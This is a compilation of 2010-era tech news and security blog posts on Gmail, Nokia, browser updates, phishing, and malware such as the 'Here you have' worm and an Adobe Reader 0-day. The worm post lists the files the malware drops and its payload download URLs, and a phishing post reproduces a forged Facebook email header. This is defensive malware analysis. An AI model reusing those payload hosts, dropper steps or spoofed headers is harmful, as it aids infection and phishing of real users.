Google offers to turn off threading in Gmail

Google has finally decided to allow users to turn off the controversial 'conversation view' threading functionality in Gmail.

Conversation view has been a characteristic of Gmail ever since it launched, but Google software engineer Dong Chen admitted in a blog post yesterday that it is the webmail service's "most hotly debated feature ".

"Threading enthusiasts say they spend less mental energy drawing connections between related messages, and that their inboxes are much less cluttered," he wrote.

"On the other hand, email traditionalists, like many former Outlook users, think conversation view just complicates something that has worked for years."

Users who prefer traditionally displayed emails will soon be able to toggle off conversation view and see their emails in chronological order, according to Chen.

"We really hoped everyone would learn to love conversation view, but we came to realize that it's just not right for some people," he said.

"Over the next few days, we'll be rolling out conversation view settings to users in organizations with the 'Enable pre-release features' option selected in the Google Apps control panel, and to individuals using Gmail."

Nokia N8 Shipments Begin

Nokia would like the world to know that its upcoming smartphone, the N8, is finished. The first batch of devices has left the factories in Finland and China, and these N8s will soon end in the hands of customers all over the world.

Many Nokia fans have wondered will there be further delays for the N8, and this is probably the best answer to that question. Recently, Nokia informed some of the customers who have pre-ordered the device they will be receiving it “during October,” as Nokia decided to “hold the shipments for a few weeks to do some final amends.” However, Nokia immediately clarified that the N8 is not being delayed, and now it proved it with the pictures of N8s leaving the factory.

The high level of transparency from Nokia shows how important the N8 is for the Finnish mobile giant. In a blog post, Nokia explains that while the first users will get the Nokia N8 “before the weekend,” most will be receiving it “over the coming days and weeks.” It’ll be interesting to see if the Nokia N8 can justify the hype when it finally reaches end users.

Xmarks service ends January 2011

Xmarks will be shutting down free browser synchronization services on January 10, 2011. For details on how to transition to recommended alternatives, consult this page.

For the full story behind the Xmarks shutdown, please read their blog post.

It’s a sad story to me

 

Here I found a good article to read: http://www.zdnet.com/blog/networking/no-more-xmarks-no/192

Microsoft Kills Live Space blogs

Microsoft announced that it has collaborated with WordPress and now onwards it will be the default blogging platform for Windows Live users. This means Microsoft is killing it’s own blogging platform and suggesting users to go for better platform called ‘WordPress’.

In TechCrunch Disrupt conference, Windows Live Director ‘Dharmesh Mehta’ announced that all existing Windows Live Spaces users will be migrated over to an account at WordPress.com.

So now onwards users who sign up for a Windows Live account get free Hotmail , the Xbox Live site , a free blog from WordPress.com and other services.

For me this move shows that Microsoft admitting they cannot compete in the blogesphere and giving up their own blog network and started shifting its Live Spaces users over to WordPress.

I think it’s a good decision, because killing a uncompetitive product is better instead of dragging it. Just imagine Windows Live Spaces running on Linux Powered WordPress!

Microsoft currently has 30 million people using its Windows Live Spaces blogging platform. Those users can port their blog posts, comments, and photos to WordPress, and redirect their old Spaces URLs to the new blog. Microsoft said Live Space users will have 6 months to migrate to WordPress.com.

If you’re not ready to migrate today, you can also choose to download your blog content, migrate later, or delete your Space.

Read more: Windowsteam

Browser cookies are becoming an issue

The New York Times is reporting a rising number of law suits against some major players because of their use of persistent web tracking:

-- Fox Entertainment Group
-- NBC Universal
-- Specific Media
-- Quantcast

The Times said the suits are claiming that the companies used Flash cookies to collect data on browsing activities in spite of the fact that users had privacy settings on to block them.

Those Local Shared Objects (LSOs) are persistent cookies that are stored in several ways and in some cases will restore themselves when deleted. One is available, with a detailed description here.

There are really mixed reviews on cookies. They range from the paranoid take of the tinfoil hat crowd (“it’s the government! Remember Roswell?”) to the mindset of marketing folks who find targeted advertising a very handy tool. And, hey, advertising does pay the bills.

Everyone agrees that, yes, it is possible for the marketeers to amass a lot of data about individuals by using cookies to monitor browsing activity. The question that probably will be decided in court is: “how much monitoring should be allowed?”

Cookie counter measures
On the New York Times site, someone who called him or herself “Blue Sun” from Stockton, NJ, left a long and detailed comment describing an entire set of anti-tracking practices, including the names of several Firefox add-ons: “Retargeting Ads Follow Surfers to Other Sites”

Blue Sun recommends using Firefox because it has lots of add-ons and lists a number that are useful:

-- Ghostery, blocks invisible trackers such as web 'bugs', pixels and beacons used by behavioral data providers and ad networks.
-- BetterPrivacy, identifies and enables you to delete locally shared objects (described above).
-- Click&Clean
-- Eraser
-- Privacy Plus

Cookie removal
You can remove the advertising cookies (not the LSOs) on your machine whenever you want:

In the Firefox menu: Tools | Privacy | Remove Individual Cookies

It’s impressive just to look in there and see the number of cookies that you’ve accumulated. If you “remove all cookies” keep in mind that you’re going to be required to use your log-in name and password on those pages on which you’ve “saved passwords” in the past.

The Firefox add-on Adblock Plus is another little helper that will simply stop ads from appearing when you visit pages that contain them. (Tools | Add-ons | Get Add-ons).

Those who would like a strong dose of Web security can also disable JavaScripting. Unfortunately that kills a lot of very useful functionality on web pages, including logins and shopping.

Macromedia's help page that describes how to use Flash Player security settings is here.

The Firefox add-on NoScript also is an excellent option for controlling Javascript running in your browser. It gives you the option of letting it run or not. That's a much more graceful way of doing it than simply shutting it off in Firefox options.

Twitter XSS vulnerability fixed

Twitterers are still clogging the micro-blogging service with little messages about the cross-site-scripting problem earlier today. Twitter has announced that the problem has been fixed.

A cross-site scripting vulnerability using "onmouseover" was being widely exploited to spread worms and redirect viewers to malicious sites.

Story here from The Register.

More Spam with JavaScript redirectors

We received new spam emails which contain a JavaScript redirector in form of a HTML attachment. The emails we received have the subject “Consultation Appointment”.

The decrypted JavaScript consists of new JavaScript code.

This JavaScript redirector loads yet another JavaScript from the internet. The domain which is hosting the malicious .js is registered to someone from Malaga. Domain tools show that this person has registered about 2.400 other domains.

The downloaded file contains an invisible, hidden iframe which is supposed to download further code from the internet. The target behind that iframe is already offline, luckily.

Twitter XSS getting abused

On Twitter a new security flaw gets currently exploited. Hackers found a way to inject malicious JavaScript code into tweets with the onMouseOver event. This can lead to pop-ups appearing, redirecting to websites, re-tweeting spam, or even worse things like cookie stealing (compromising the user accounts). The problem is that Twitter doesn’t properly filter out some tags in tweets.

Users should be very cautious when seeing colored text blocks (background and text colors are the same, called “rainbow tweets”) – these are currently mostly used to exploit the security vulnerability. Hopefully, Twitter closes the security hole soon! Until then, using the NoScript web browser extension or disabling JavaScript on Twitter helps against the attack. Also, using twitter applications which rely upon the Twitter API aren’t affected.

Flash Player Updates fix 0-day-vulnerability

Adobe fixed the vulnerability in Flash Player in a record time again. Just one week after the 0-day became public and started to get exploited, an update is available to close the security hole. Even though Adobe Reader and Acrobat are affected (which are supposed to get an update in 2 weeks), until now we’ve only seen exploits against the Windows Flash Player.

Users and administrators should update their Flash Player as soon as possible! The version 10.1.85.3 fixes the issue for Windows, Unix, Solaris and is available through Adobe’s download center. Android users can get the update to 10.1.95.1 on the Android Market Place.

Scammers set their sights on Resident Evil: Afterlife

Resident Evil. Man, those films are terrible.

Frankly, I’m happy to end the writeup right there, but if I did you’d miss out on all the fun.

Resident Evil Afterlife is now in cinemas (unfortunately) and scammers are all too happy to cash in.

watchresidentevil4(dot)com is our port of call today:

Try to watch the film, and you’re prompted to install ClickPotato (from Pinball Corp).

There’s also four other items preticked, which is nice of them.
Installing that lot gives you a prompt to “see premium content”.

You know where this is going, and it isn’t anywhere other than “the bottom of a ditch”.
I got:

Some sort of sign up to view content website!

A copyright infringement warning!

About six thousand adverts for Russian dating / bride-to-be services!

What I absolutely did not get was any form of Resident Evil action. Depending on how you feel about such things, that might be such a bad outcome. You still have all of that stuff installed on your PC, though…

Security issues on Android

One unique security feature of Android is the permission check when installing 3rd party apps. The system lists all permissions that an app requires and asks the user to check if that’s alright. Such permissions are the ability to receive your location, send or receive text messages, internet access, phone calls and many more. The user can be sure that the app is not doing any of such activities without the appropriate permission. In case the developer forgets to add a particular permission then the operating system will simply block the corresponding function which leads to a “Force Close”, which means the app will be terminated.

Not too long ago the first Android Trojan got some media attention. The first variant of the malware (which was detected by Avira as “TR/SMS.AndroidOS.A”) pretended to be a Movie player. Instead of playing movies the malware was sending messages to premium numbers in Russia. Suspiciously for the user it had to ask for the permission to send SMS. In this case it should be obvious that a movie player should not be able to send text messages. But what if a Trojan hides in a fancy messaging app instead?

One of the biggest security issues however are security exploits. One example was the HTC EVO 4G released earlier this year. There were two exploitable binaries (“skyagent” and “hstools”) that allowed access to the root of the file system. Potentially there could be new exploitable binaries in any new phone. Not only in the operating system but also in additional components installed by the phone manufactures and network providers. Some communities also exploit such vulnerabilities to gain root access to their phones in order to install custom ROMs. Recently so called 1-click root tools are very popular. The risk here is that most of the times these security holes are never fixed until the next OS update and therefore the vulnerabilities are also a worthwhile target for malware writers! With root access a malicious app could easily install itself as system application or even load into the Linux kernel directly as a loadable kernel module. The user probably wouldn’t even recognize the malware, and even if he does, he will have a hard time to get rid of it. Even after a factory reset the malware is still active because during the wipe the system partition is not touched at all. Sure you can flash a new custom ROM to remove the malware but then you also void the warranty of your phone.

Another recent example for exploits is Adobe Flash Player. Unfortunately the tradition of zero days exploits known from Windows might also catch on more platforms in the future. There’s already a critical vulnerability in Flash for Android 10.1.92.10 which could allow an attacker to take control of the system. Currently Flash is only working on Android 2.2 which is not very widespread yet, but for the end of 2012 Adobe expects to have Flash up and running on 250 million Smartphones. Besides that, Flash will not only run on Android but is supposed to run on BlackBerry OS, Symbian, web OS and Windows Phone 7 as well.

After all Android’s popularity is still in an early stage. However due to the aggressive growth (currently 200.000 new Android devices are activated every day) the platform gains more and more popularity. It does not only compete with iPhone and Symbian OS but due to the introduction of Android tablet PCs, netbooks and Google TV there will also be some competition for desktop PCs. These are clear signs that in the longer run Android will become a potential target for malware attacks.

Currently there is no critically dangerous malware in the field but it’s still very important that people use their phone just as carefully as they use their desktop PC because technically an attack is always possible. Think twice what apps you are installing, avoid visiting dubious websites and don’t open suspicious links you receive through text messages, emails and social media platforms.

Browser Updates, again

Google released version 6.0.472.59 of its Chrome web browser. It fixes 10 security vulnerabilities; 1 is only affecting Mac OS X and critical, 6 are rated “high” in their severity. As usual, the update should get delivered and installed automatically – but it doesn’t hurt to check via the “Info about Chrome” option in the “settings” menu whether  the new version is already installed.

The Mozilla developers pulled the update to Firefox 3.6.9 due to some stability issues some users experienced. Now Firefox 3.6.10 is available which fixes the security vulnerabilities like 3.6.9 and also the instabilities. It is available via “Help” – “Check for Updates” and should be installed ASAP, too.

New phishing-spam waves using Facebook as bait

We have started to see again a large increase in the amount of emails pretending to come from Facebook. There are two types of emails which are being sent in large amounts currently. Both of them use classical types of social engineering techniques.

The first type is using the old trick with “the photos”. The final target is a website where SMSes can be sent for “free” (note the quotes). I would like to emphasize again that there is nothing out there for free. Even if you don’t pay for it, those who offer the service (or whatever is given for “free”) do get something in exchange. It might be your telephone number, your email address or something similar which is worth a lot on the Internet.

The second email wave uses the old trick with “notifications” from Facebook. The target website is a Canadian Pharmacy website in a new design.

By analyzing the headers of the two messages, we find already known techniques, which were used in the previous outbreaks using some known names as bait. The email headers are very well constructed by adding a lot of entries which make the email look as close as possible to the original Facebook mails.

Fake headers

Received: from [10.18.255.135] ([10.18.255.135:59076]) by mta016.snc1.facebook.com (envelope-from <update+dtymgjriqknv@facebookmail.com>) (ecelerity 2.2.2.45 r(34067)) with ECSTREAM id DE/6C-10257-74CA947F; Thu, 16 Sep 2010 23:15:00 -0700 X-Facebook: from zuckmail ([MTI3LjAuMC4x]) by www.facebook.com with HTTP (ZuckMail); Date: Thu, 16 Sep 2010 23:15:00 -0700 To: <XXX> From: Facebook <update+dtymgjriqknv@facebookmail.com> Reply-to: Facebook <update+dtymgjriqknv@facebookmail.com> Subject: [Definitely Spam?] You have notifications pending Message-ID: <53365abd632d6d52eed06318304b59c1@www.facebook.com> X-Priority: 3 X-Mailer: ZuckMail [version 1.00] X-Facebook-Camp: stale_email X-Facebook-Notify: stale_email; mailid=d2005b860446af88a804a830f15e92 Errors-To: update+dtymgjriqknv@facebookmail.com X-FACEBOOK-PRIORITY: 1 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=”b1_53365abd632d6d52eed06318304b59c1″

 

Real headers

Received: from [10.18.255.138] ([10.18.255.138:61673]) by mta015.snc1.facebook.com (envelope-from <notification+o9=o_tfc@facebookmail.com>) (ecelerity 2.2.2.45 r(34067)) with ECSTREAM id B3/E5-13534-B62629C4; Thu, 16 Sep 2010 11:31:07 -0700 X-Facebook: from zuckmail ([MTI3LjAuMC4x]) by www.facebook.com with HTTP (ZuckMail); Date: Thu, 16 Sep 2010 11:31:07 -0700 To: Sorin Mustaca <sorin.mustaca@gmail.com> From: Facebook <notification+o9=o_tfc@facebookmail.com> Reply-to: noreply <noreply@facebookmail.com> Subject: ??? wants to be friends on Facebook. Message-ID: 96b769da5595cef276c6b4ee6b9aed11@www.facebook.com X-Priority: 3 X-Mailer: ZuckMail [version 1.00] X-Facebook-Notify: friend; from=1659283218; mailid=2fc5f99G2738aab8Gca41707G2 Errors-To: notification+o9=o_tfc@facebookmail.com X-FACEBOOK-PRIORITY: 0 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=”b1_96b769da5595cef276c6b4ee6b9aed11″

 

These are the bottom headers. Looking at the top received headers, it is clear that the messages were sent by botnet drones (infected computers). The mails have almost always the same headers as described in the table (left row), and then always different servers which have nothing to do with Facebook.

This technique shows clearly that the messages are send using a botnet. We have seen senders from Australia, Turkey and USA, but there are definitely senders from other countries as well. As usual, the target domains are owned by a Chinese person and the nameservers are all located in Russia.

The Anti-Botnet Initiative

The Anti-Botnet Initiative has now been started. The initiative is a cooperation of eco and The German Federal Bureau for Information Security (BSI) and has created a telephone hotline for persons which may have their computers infected and seem to be a part of a botnet. In order to be able to detect this, the major ISPs in Germany are also cooperating (1und1, Telekom, Kabel BW, NetCologne, QSC and Versatel). The ISPs monitor suspicious activity on all IP addresses in their pool. As suspicious activity is considered, for example, the sending of huge amounts of data on certain ports like 25 for SMTP (used to send spam emails), incoming HTTP connections (used to serve HTTP connections) and so on. Once the ISP detects this, the customer gets an email notification with information about the suspicious activity and various other information (like the telephone number of the hotline). The user is also instructed to have a look on the www.botfrei.de website.

There are also two antivirus solutions offered for free to clean up the infected computers. There is an online scanner from Symantec, called DE-Cleaner and there is the Computer Bild Magazine’s DE-Cleaner Rescue system using the Avira anti-malware Technology.

The difference between the two solutions is pretty straight forward: The first one is a windows program which scans the hard drives while Windows is active, while the other one is a bootable Linux CD which allows the user to start a scan and clean all harddisk partitions while Windows is not running. The advantage of the second method is that it offers the possibility to detect for example rootkits that might be running within Windows and hide malware inside the operating system. While running the Linux from the rescue system, Windows is completely inactive (not as in Safe mode) so the rootkits are also not active. This is actually the only reliable possibility to detect rootkits.

The Avira technologies used in this Rescue System comprise the Command Line Scanner ScanCL, which is also available here. Note that this tool works only when a licensed Avira product (Avira AntiVir Personal suffices) is installed on the computer. The other product used is the Avira Command Line Updater which allows the Rescue System to update the detection engine and the signatures.

By providing its command line scanner for free, Avira continues its strategy to provide a basic antivirus protection for free to everyone.

“Here you have” worm linked to cyber jihadists

A worm collectively dubbed by the security industry as the “Here you have worm” has been making its way onto corporate networks over the past 24 hours.  The worm arrives via e-mail using the subject line “Here you have” or “Just For you“ along with an executable disguised as a PDF file.  It first appeared last month sending spam e-mails from iraq_resistance@yahoo.com.

The worm creates the following files:  (Note: See the full report in our sandbox -> http://x.maldb.com/?p=44309#more-44309)

/WINDOWS/autorun.inf
/WINDOWS/autorun2.inf
/WINDOWS/csrss.exe
/WINDOWS/ff.exe
/WINDOWS/gc.exe
/WINDOWS/hst.iq
/WINDOWS/ie.exe
/WINDOWS/im.exe
/WINDOWS/op.exe
/WINDOWS/pspv.exe
/WINDOWS/rd.exe
/WINDOWS/re.exe
/WINDOWS/re.iq
/WINDOWS/system/Administrator CV 2010.exe
/WINDOWS/system/updates.exe
/WINDOWS/system32/SendEmail.dll
/WINDOWS/system32/wbem/Logs/wbemcore.lo_
/WINDOWS/system32/wbem/Logs/wbemprox.log
/WINDOWS/tryme1.exe
/WINDOWS/vb.vbs
/autorun.inf
/open.exe

Creates several registry keys to block the execution of anti-malware programs.

Connects to:

members.multimania.co.uk/yahoophoto/tryme.iq
members.multimania.co.uk/yahoophoto/ff.iq
members.multimania.co.uk/yahoophoto/gc.iq
members.multimania.co.uk/yahoophoto/ie.iq
members.multimania.co.uk/yahoophoto/im.iq
members.multimania.co.uk/yahoophoto/m.iq
members.multimania.co.uk/yahoophoto/op.iq
members.multimania.co.uk/yahoophoto/pspv.iq
members.multimania.co.uk/yahoophoto/rd.iq
members.multimania.co.uk/yahoophoto/w.iq
members.multimania.co.uk/yahoophoto/SendEmail.iq
members.multimania.co.uk/yahoophoto/hst.iq
members.multimania.co.uk/yahoophoto/re.iq
members.multimania.co.uk/yahoophoto/tryme.iq

In further research, we have found iraq_resistance to be the known handle for a Libyan hacker/terrorist who we believe to be responsible for at least the first version of the worm discovered in mid-august.

Several underground forum communications have linked “iraq_resistance” to the malware creation as well as the terrorist (electronic jihad) organization “Brigades of Tariq ibn Ziyad.”

Here is a copy of a an iraq_resistance post, which states the groups number one priority loud and clear: “ Required young people to participate in the campaign of the electronic jihad اجهزة امريكية تابعة للجيش الامريكي Group was established as the Brigades of Tariq ibn Ziyad and goal of this group to penetrate U.S. agencies belonging to the U.S. Army ” – Google Translate Link

Besides the terrorist link, several posts have been made in other underground hacking forums, such as xp10.com.

It’s still unclear if this second revision of the worm is linked to “iraq_resistance” or “Brigades of Tariq ibn Ziyad,”  as neither person/group has claimed responsibility, but it’s highly likely due to the nature of the group.

New 0-day Exploit for Adobe Reader

A malicious PDF file has turned up which exploits a new security vulnerability in Adobe Reader and Acrobat – even in the most current version 9.3.4 and 8.2.4, on all supported platforms. There is currently no update available from Adobe which fixes the vulnerability. The company is aware of the problem though.

The weakness is a buffer overflow within the CoolType.dll of the Adobe Reader and Acrobat installation. While parsing a PDF document with specially prepared SING (Smart INdependent Glyphlets) fonts it is possible to abuse the vulnerability to execute malware.

The malicious PDF has been used in limited attacks only currently. It seems to be an early implementation of the exploit as it crashes the Reader upon opening the file; though after that another PDF file gets opened to somewhat hide that an infection took place.

Upon execution the exploit PDF first checks if the Reader is vulnerable and in case the version is too old for this exploit, shows a message that the user should update to a newer Adobe Reader version. It then drops the file “Documents and Settings\<Username>\Local Settings\Temp\hlp.cpl” which is detected as the Trojan TR/Dldr.Small.pgn and starts it. The dropped Trojan in turn tries to download http://xxxxxxxxxxx.us/from/wincrng.exe and to store it as winhelp32.exe – this file is offline, though. Also, it drops the camouflage PDF to “Documents and Settings\<Username>\Application Data\golf clinic.pdf” and opens it via a function in the Trojan called “MakeAndShowEgg”. After all this, the cyber criminals try to wipe the traces of the attack and create the batch file DMS.BAT which deletes the Trojan hlp.cpl.

As there is no fix available yet it is very important to be cautious about which PDF files to open. Don’t open PDF files sent by email from strangers and also relinquish opening PDFs from websites which you don’t really need. Where it is possible, using alternative PDF readers such as the basic embedded one in Google Chrome or Foxit PDF Reader (which isn’t affected by this vulnerability) is a good idea.

Avira has added detection for the malicious PDF as EXP/Pidief.WM.

Browser Updates

The Mozilla foundation just released the popular web browser Firefox in version 3.6.9. The new version fixes overall 14 security vulnerabilities of which 10 are rated critical by the developers. Additionally, they added a new feature called “X-FRAME-OPTIONS“-header which shall help mitigating clickjacking attacks as web site owners can ensure with this header that their content isn’t inserted into other sites via frames. The update is available through the automatic update mechanism ( via the “Help” – “Search for updates” menu).

The developers at Google already published version 6 of their web browser last week. The release also closes 14 security holes, of which 7 get the “high” rating concerning their impact. The update should be completely automatic and in the background, however, on some Windows XP systems the users need to choose the “settings” icon on the right side of the address bar and choose “About Google Chrome”, where they then are offered to install the new release. A nice feature security-wise is the now integrated basic PDF reader. It can be activated by typing “about:plugins” into the address bar. This should help mitigate attacks on outdated versions of PDF readers on the computer. Just since today, a minor update to version 6.0.42.55 is available; it fixes minor issues with autocomplete, setting as default browser and importing data from other browsers.

And now even Apple has released an update for its web browser Safari for Mac OS X and Windows – version 5.0.2 and 4.1.2. It fixes 3 critical security vulnerabilities which allow for malicious code execution – 2 for Mac OS X and Windows and 1 just affecting Safari under the Windows operating systems. The update is available through the automatic updater or can be downloaded manually from Apples download web site.

As the new browser versions deal with so many critical security vulnerabilities, users and administrators should install them as soon as possible!

Mitigation for Windows Applications DLL-Search-Path Vulnerabilities

A whole bunch of Windows applications is vulnerable to a so-called binary-planting attack which allows for remote code execution. Microsoft released a security advisory about this issue which isn’t easy to fix properly. This issue arises due to the (defined and well documented) behavior of Windows when loading libraries by an application. A .dll to load gets searched in a certain standard path list. This list also includes the current working directory, which is the place a document gets opened from for example. When a file with the name of a DLL which the corresponding application needs to load is placed into the working directory, it will get loaded – this can be a malicious DLL though.

Microsoft offers a patch as workaround which adds a registry key influencing this DLL search path. Unfortunately, the changed behavior of DLL loading breaks several Windows programs. Now the company released a Fix-it tool which can be executed after the patch has been applied. It lessens the restrictions introduced by the patch so that most applications do work again. Windows then still blocks loading DLLs from network shares or WebDAV, but if a malicious DLL is located within a local working directory, an attack may still succeed. Anyhow, this may be the only workaround option which is usable.

Administrators and users are well advised to apply the patch (and in most cases, lessen the restrictions with the Fix-it-tool) so the attack surface gets minimized.